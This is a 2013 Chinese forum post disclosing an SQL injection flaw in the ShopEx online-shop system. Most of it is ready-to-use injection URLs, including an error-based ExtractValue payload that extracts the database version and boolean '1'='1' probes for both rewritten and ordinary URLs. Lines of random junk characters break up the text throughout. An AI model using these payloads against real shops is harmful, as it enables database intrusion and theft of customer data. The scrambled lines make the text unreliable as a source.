注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
& _. i% ^: |$ |& @4 V+ B% G; [' J1 V7 x' u- U% s1 i; H
好吧,我扯远了~~8 D5 L+ D7 a: {) ~+ ~5 ]; p
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
6 V* d0 E% S9 k% ]8 h7 ?, V不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
# u0 o1 v. Q/ P. `4 h$ t. {7 o( h. z% \
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html # h8 y5 z* z `' J. F
- Y1 W0 |$ G3 v4 q
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
& r) e# u- v$ j' X5 P) c( r$ t% y* R2 m7 n2 K { w6 Y
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html 5 R5 B6 D9 a9 N5 k, q4 X
$ P0 ?+ h* b% J# N$ w
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html 1 V1 y) V2 {! q. Q. M
+ Z* W7 U* r2 R; e0 P
. @' y$ q. F2 b0 G6 S1 ~% V一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
3 V2 m, i* r* @ C1 \5 a如何注入就不多说了,10多年的东西了…不会也会了… 3 D, @8 A6 C: t: h" o4 H! t. x
/ i4 D+ N0 i5 Q* ?4 A$ J* k/ R5 \; r* l) \7 L
4 |9 a$ O! I! N: t
6 J9 G! Y. h$ T0 A7 E |
发表于 2013-2-19 08:31:27
收藏
支持
反对